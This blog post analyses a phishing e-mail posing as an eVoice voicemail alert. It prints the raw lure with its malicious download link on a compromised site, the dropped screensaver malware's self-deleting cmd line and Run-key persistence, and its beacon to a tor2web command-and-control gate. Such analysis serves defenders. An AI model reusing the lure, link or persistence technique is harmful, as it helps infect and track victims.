“eVoice Voicemail (Callback: 379-433-5389)” Virus e-mail

I had an e-mail to an address I believe was leaked by logmein or dyndns…

Titled “eVoice Voicemail (Callback: 379-433-5389)”


Received: from PTYAMOPS (Unknown []) by my.mailserver.here
with ESMTP ; Tue, 13 Jan 2015 15:58:39 +0000
Message-ID: <DGF037F4.6700866@readsoft.com>
Date: Tue, 13 Jan 2015 16:59:31 +0200
From: 379-433-5389 <messages@evoice.com>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Thunderbird/24.2.0
MIME-Version: 1.0
To: <me@address.refacted>
Subject: eVoice Voicemail (Callback: 379-433-5389)
Content-Type: text/html; charset=”ISO-8859-1″
Content-Transfer-Encoding: 7bit
Return-Path: asphyxiates38@readsoft.com

eVoice – A Better Way to Connect<http://a248.e.akamai.net/f/248/528/1d/home.evoice.com/evoice_em_assets/evoice_logo_main.png&gt;

Voicemail Transcription

This message could not be transcribed
Click To Listen Voice Message

Message Details


Tue, 13 Jan 2015 16:59:31 +0200




53 seconds
Want Better Transcriptions?
Upgrade your voice-to-text plan and get better quality message transcriptions. Upgrades available by calling Support at 866-761-8108. <http://baliklikaplica.com/wp-content/plugins/akossmett/_inc/img/1.php&gt;
J2 Global – Cloud Services for Business <http://www.j2.com&gt;

© 2014 j2 Cloud Services, Inc. All rights reserved. eVoice is a registered trademark of j2 Cloud Services, Inc.

When you click the link it takes you to a page with a javascript download trigger and a redirect to efax.com or similar.
In my case it served me “wav_voice01829479-20150113.zip” which contained “wav_voice01829479-20150113.scr” – VirusTotal Report / Malwr Report
SHA256: c991923abacc9b18b0043bb0d71eb5b15558cf7a94cf6e6debdb0464660eea38

evoice junk

When you run the file it loads, waits a few seconds, creates a copy of itself and then loads a command prompt and quits itself.

cmd /D /R ping -n 10 localhost && del “C:\Users\derp\Desktop\wav_voice01829479-20150113.scr” && start /B “” “C:\Users\derp\AppData\Roaming\Windows\winlogin.exe” && exit

This command removes the file that the user runs and runs it’s own new copy. It also adds itself to the User (and possibly system, if running as an admin user) Run key in the registry.
It instantly then uses https://api.ipify.org to fetch the current IP address of the infected system.

tor2web.org is then being used to contact the CnC server, currently failing or blocked (https://ho7rcj6wucosa5bu.tor2web.org/gate.php):

POST /gate.php HTTP/1.1
Cookie: disclaimer_accepted=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Host: ho7rcj6wucosa5bu.tor2web.org
Content-Length: 128
Cache-Control: no-cache

{108B7599-0406-4B26-AE7D-FD738CD4C09B}SERV }W7VM1 }my.ip.address.here

HTTP/1.1 403 Forbidden
Content-Length: 1190
Strict-Transport-Security: max-age=31536000
Content-Type: text/html
Cache-Control: no-cache

<title>Tor2web Error: Access Denied to Entire Hidden Service</title>
<meta content=”text/html;charset=utf-8″ http-equiv=”content-type” />
<meta content=”en” http-equiv=”content-language” />
<meta content=”noindex” name=”robots” />
<script src=”/antanistaticmap/tor2web.js” type=”text/javascript”></script>
<link href=”/antanistaticmap/tor2web.css” type=”text/css” rel=”stylesheet” />
<div id=”tor2web”>
<div id=”header”>
<h1><a href=”https://www.tor2web.org”><img src=”/antanistaticmap/tor2web.png” alt=”tor2web logo” /></a></h1>
<div id=”tor2web-content”>
<h2 id=”tor2web-title”>Tor2web Error: Access Denied to Entire Hidden Service</h2>
<p>Access to this Hidden Service has been completely blocked</p><br />
<p>It may happen that Tor2web maintainers have to block proxy access to certain explicit illegal contents in order to keep the network up and running. In such case you can still access the content directly by using Tor, that’s because Tor2web just acts as a proxy server and the content is on a Tor Hidden Service.</p>

This entry was posted in Uncategorized. Bookmark the permalink.

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s